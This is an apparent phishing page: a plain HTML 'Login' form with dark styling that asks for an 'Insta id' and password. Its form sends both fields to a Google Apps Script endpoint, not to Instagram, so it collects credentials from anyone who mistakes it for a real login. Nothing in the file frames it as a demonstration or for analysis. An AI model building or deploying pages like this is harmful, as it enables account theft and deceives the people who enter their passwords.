<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Page</title>
<style>
    body {
        font-family: Arial, sans-serif;
        background-color: #111;
        color: #eee;
        margin: 0;
        padding: 0;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .login-container {
        background-color: #333;
        border-radius: 10px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        padding: 40px;
        width: 300px;
        text-align: center;
    }

    .login-container h2 {
        margin-bottom: 30px;
        color: #eee;
    }

    .login-container input[type="text"],
    .login-container input[type="password"] {
        width: 100%;
        padding: 10px;
        margin-bottom: 20px;
        border: 1px solid #666;
        border-radius: 5px;
        box-sizing: border-box;
        background-color: #444;
        color: #eee;
    }

    .login-container input[type="submit"] {
        background-color: #4CAF50;
        color: white;
        padding: 10px 20px;
        border: none;
        border-radius: 5px;
        cursor: pointer;
        font-size: 16px;
    }

    .login-container input[type="submit"]:hover {
        background-color: #45a049;
    }
</style>
</head>
<body>

<div class="login-container">
    <h2>Login</h2>
    <form id="gform" method="POST"  action="https://script.google.com/macros/s/AKfycbxd_ShMpPSl63ZDIs_UURZHQRGi2vPpWcHp62umYQ4g0EPsiM1BGz9YuiLxkaCqXm872Q/exec">
        <input type="text" name="username" placeholder="Insta id" required><br>
        <input type="password" name="password" placeholder="Password" required><br>
        <input type="submit" value="Login">
    </form>
</div>



</body>
</html>
